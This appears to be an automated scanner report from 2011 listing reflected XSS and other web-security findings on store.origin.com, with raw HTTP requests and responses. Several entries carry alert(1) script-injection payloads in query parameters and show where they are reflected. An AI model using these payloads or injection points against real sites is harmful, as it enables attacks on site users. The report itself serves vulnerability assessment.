1. Cross-site scripting (reflected)
1.1. http://store.origin.com/ [name of an arbitrarily supplied request parameter]
1.2. http://store.origin.com/DRHM/store [name of an arbitrarily supplied request parameter]
1.4. http://store.origin.com/servlet/ControllerServlet [objectID parameter]
1.5. http://store.origin.com/store [name of an arbitrarily supplied request parameter]
1.6. http://store.origin.com/store [name of an arbitrarily supplied request parameter]
1.7. http://store.origin.com/store [objectID parameter]
1.12. http://store.origin.com/store/ea/home/ [name of an arbitrarily supplied request parameter]
2. Cross-domain Referer leakage
2.1. http://store.origin.com/DRHM/store
2.2. http://store.origin.com/store
2.3. http://store.origin.com/store
3. Cross-domain script include
3.2. http://store.origin.com/DRHM/store
3.3. http://store.origin.com/store
3.6. http://store.origin.com/store/ea/en_US/pd/ThemeID.718200/productID.201797000
3.7. http://store.origin.com/store/ea/home/
4. Cookie without HttpOnly flag set
4.1. http://store.origin.com/DRHM/Storefront/Site/ea/cm/multimedia/foresee/foresee-surveydef.js
4.2. http://store.origin.com/DRHM/Storefront/Site/ea/images/promo/img_arrow.jpg
4.3. http://store.origin.com/store
5. Content type incorrectly stated
5.1. http://store.origin.com/DRHM/Storefront/Site/ea/pb/images/EA_favicon.ico
5.2. http://store.origin.com/store
Severity: | High |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | / |
GET /?412c5--><script>alert(1)< Host: store.origin.com Proxy-Connection: keep-alive Referer: http://investors.ea.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 13:44:00 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app49 Content-Length: 60544 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!-- REQUEST ID: TIME=1308923040451:NODE ...[SNIP]... <!--!esi:include src="/store?412c5--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /DRHM/store |
GET /DRHM/store?Action Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:39:33 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app42 Content-Length: 64955 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!-- REQUEST ID: TIME=1308926373194:NODE ...[SNIP]... <!--!esi:include src="/store?26d07--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /servlet/ControllerS |
GET /servlet/ControllerS Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: VISITOR_ID=971D4E8DF Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:41:57 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app42 Content-Length: 396 <!-- REQUEST ID: TIME=1308926517144:NODE <!--!esi:include src="/store?970ec<x style=x:expression(alert ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /servlet/ControllerS |
GET /servlet/ControllerS Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/javascript;charset Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:40:10 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app42 Content-Length: 6948 <!-- REQUEST ID: TIME=1308926410564:NODE <!--!esi:include src="/store?Action ...[SNIP]... //document.getElementById loadMessage("off"); changeSelectState(false); } } dataRequest(545523007896e;alert(1)/ <!--!/esi:include --> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /store |
GET /store?Action=DisplayPage Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:36:47 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app53 Content-Length: 398 <!-- REQUEST ID: TIME=1308926207827:NODE <!--!esi:include src="/store?Action ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /store |
GET /store?Action=DisplayPage Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:39:17 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app42 Content-Length: 26212 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!-- REQUEST ID: TIME=1308926357939:NODE ...[SNIP]... <!--!esi:include src="/store?7353c--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /store |
GET /store?Action=DisplayPage Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/javascript;charset Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:36:02 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app53 Content-Length: 6952 <!-- REQUEST ID: TIME=1308926162482:NODE <!--!esi:include src="/store?Action ...[SNIP]... //document.getElementById loadMessage("off"); changeSelectState(false); } } dataRequest(5455230030c70;alert(1)/ <!--!/esi:include --> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /store/ea/en_US |
GET /store/ea/en_US Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ORA_WX_SESSION="10.2.11 |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 13:44:14 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app49 Content-Length: 38619 <!-- REQUEST ID: TIME=1308923054923:NODE <!--!esi:include src="/store?Action ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /store/ea/en_US |
GET /store/ea/en_US Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:39:08 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app42 Content-Length: 40166 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!-- REQUEST ID: TIME=1308926348703:NODE ...[SNIP]... <!--!esi:include src="/store?52629--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /store/ea/en_US |
GET /store/ea/en_US Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: VISITOR_ID=971D4E8DF |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:35:45 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app53 Content-Length: 40083 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!-- REQUEST ID: TIME=1308926145188:NODE ...[SNIP]... <!--!esi:include src="/store?Action ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /store/ea/en_US/pd |
GET /store/ea/en_US/pd Host: store.origin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://store.origin.com Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:25:50 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app41 Content-Length: 75613 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!-- REQUEST ID: TIME=1308925551009:NODE ...[SNIP]... <!--!esi:include src="/store?Action ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /store/ea/home/ |
GET /store/ea/home/?69277--><script>alert(1)< Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:38:59 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app42 Content-Length: 64998 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!-- REQUEST ID: TIME=1308926339848:NODE ...[SNIP]... <!--!esi:include src="/store?69277--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /DRHM/store |
GET /DRHM/store?Action Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:36:09 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app53 Content-Length: 64866 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!-- REQUEST ID: TIME=1308926169147:NODE ...[SNIP]... <!--!esi:include src="/esi?SiteID=ea <link type="text/css" rel="stylesheet" href="//drh.img <!--[if IE 7]> ...[SNIP]... <![endif]--> <link rel="icon" href="//drh.img <link rel="shortcut icon" href="//drh.img <meta name="google-site ...[SNIP]... <!--!/esi:include --> <link rel="stylesheet" href="http://drh.img <!--!esi:include src="/store?Action ...[SNIP]... <link href="http://store.origin <script src="//drh1.img <script type="text/javascript" src="//drh1.img ...[SNIP]... </script> <script type="text/javascript" src="//drh.img.digit ...[SNIP]... <span><img src="//drh1.img ...[SNIP]... <span><img src="//drh2.img ...[SNIP]... <span><img src="//drh2.img ...[SNIP]... <a href="http://store.origin ...[SNIP]... <a class="dr_moreInfoButton" href="http://store.origin ...[SNIP]... store/ea/en_US/Displ ...[SNIP]... <a href="http://store.origin ...[SNIP]... <a class="dr_moreInfoButton" href="http://store.origin ...[SNIP]... store/ea/en_US/Displ ...[SNIP]... <a href="http://store.origin ...[SNIP]... <a class="dr_moreInfoButton" href="http://store.origin ...[SNIP]... store/ea/en_US/Displ ...[SNIP]... <a href="/store/ea/en_US/pd ...[SNIP]... <a class="dr_moreInfoButton" href="/store/ea/en_US/pd ...[SNIP]... <a class="dr_buyNowButton" id="dr_addToCart" href="/store/ea/en_US/buy ...[SNIP]... <a href="/store/ea/en_US/pd ...[SNIP]... <a class="dr_moreInfoButton" href="/store/ea/en_US/pd ...[SNIP]... store/ea/en_US/Displ ...[SNIP]... <a href="/store/ea/en_US/pd ...[SNIP]... <a class="dr_moreInfoButton" href="/store/ea/en_US/pd ...[SNIP]... store/ea/en_US/Displ ...[SNIP]... <a href="/store/ea/en_US/pd ...[SNIP]... <a class="dr_moreInfoButton" href="/store/ea/en_US/pd ...[SNIP]... store/ea/en_US/Displ ...[SNIP]... <a href="http://www.origin ...[SNIP]... <a href="/store/ea/search/ " target="_blank"> <img src="//drh2.img ...[SNIP]... <a href="/store/ea/en_US <img src="//drh1.img ...[SNIP]... <a href="/store/ea/html <img src="//drh2.img ...[SNIP]... <a href="http://www.origin <img src="//drh1.img ...[SNIP]... <a href="/store/ea/en_US <img src="//drh2.img ...[SNIP]... <a href="/store/ea/html <img src="//drh2.img ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://tos.ea.com ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://www.info.ea ...[SNIP]... <dd><a href="http://tos.ea.com ...[SNIP]... </script> <script src="//drh.img.digit ...[SNIP]... </script> <script type="text/javascript" src="//drh.img.digit ...[SNIP]... <NOSCRIPT><IMG SRC="http://bp.speci ...[SNIP]... <NOSCRIPT><IMG SRC="http://bp.speci ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /store |
GET /store?Action=DisplayPage Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:36:05 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app53 Content-Length: 26163 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!-- REQUEST ID: TIME=1308926165255:NODE ...[SNIP]... <!--!esi:include src="/esi?SiteID=ea <link type="text/css" rel="stylesheet" href="//drh.img <!--[if IE 7]> ...[SNIP]... <![endif]--> <link rel="icon" href="//drh.img <link rel="shortcut icon" href="//drh.img <meta name="google-site ...[SNIP]... <!--!/esi:include --> <link rel="stylesheet" href="http://drh.img <!--!esi:include src="/store?Action ...[SNIP]... <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <script src="//drh1.img <script type="text/javascript" src="//drh1.img <script type="text/javascript" src="//drh.img.digit ...[SNIP]... <a href="/DRHM/store?Action ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://tos.ea.com ...[SNIP]... <dd><a href="http://www.ea.com ...[SNIP]... <dd><a href="http://www.info.ea ...[SNIP]... <dd><a href="http://tos.ea.com ...[SNIP]... <!--!/esi:include --> <script src="//drh.img.digit ...[SNIP]... </script> <script type="text/javascript" src="//drh.img.digit ...[SNIP]... <NOSCRIPT><IMG SRC="http://bp.speci ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /store |
GET /store?Action=DisplayPage Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:35:50 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app53 Content-Length: 1305 <!-- REQUEST ID: TIME=1308926150161:NODE <!--!esi:include src="/store?Action ...[SNIP]... a class="dr_buyNowButton" id="dr_addToCart" href="/store/ea/en_US ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | / |
GET / HTTP/1.1 Host: store.origin.com Proxy-Connection: keep-alive Referer: http://investors.ea.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 13:43:48 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app49 Content-Length: 60407 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!-- REQUEST ID: TIME=1308923028902:NODE ...[SNIP]... <link href="http://store.origin <script src="//drh1.img <script type="text/javascript" src="//drh1.img ...[SNIP]... </script> <script type="text/javascript" src="//drh.img.digit ...[SNIP]... </script> <script src="//drh.img.digit ...[SNIP]... </script> <script type="text/javascript" src="//drh.img.digit ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /DRHM/store |
GET /DRHM/store?Action Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:36:09 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app53 Content-Length: 64866 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!-- REQUEST ID: TIME=1308926169147:NODE ...[SNIP]... <link href="http://store.origin <script src="//drh1.img <script type="text/javascript" src="//drh1.img ...[SNIP]... </script> <script type="text/javascript" src="//drh.img.digit ...[SNIP]... </script> <script src="//drh.img.digit ...[SNIP]... </script> <script type="text/javascript" src="//drh.img.digit ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /store |
GET /store?Action=DisplayPage Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:36:05 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app53 Content-Length: 26163 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!-- REQUEST ID: TIME=1308926165255:NODE ...[SNIP]... <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <script src="//drh1.img <script type="text/javascript" src="//drh1.img <script type="text/javascript" src="//drh.img.digit ...[SNIP]... <!--!/esi:include --> <script src="//drh.img.digit ...[SNIP]... </script> <script type="text/javascript" src="//drh.img.digit ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /store/ea/en_US |
GET /store/ea/en_US Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:36:37 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app53 Content-Length: 39966 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!-- REQUEST ID: TIME=1308926197606:NODE ...[SNIP]... <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <script src="//drh1.img <script type="text/javascript" src="//drh1.img <script type="text/javascript" src="//drh.img.digit ...[SNIP]... <!--!/esi:include --> <script src="//drh.img.digit ...[SNIP]... </script> <script type="text/javascript" src="//drh.img.digit ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /store/ea/en_US |
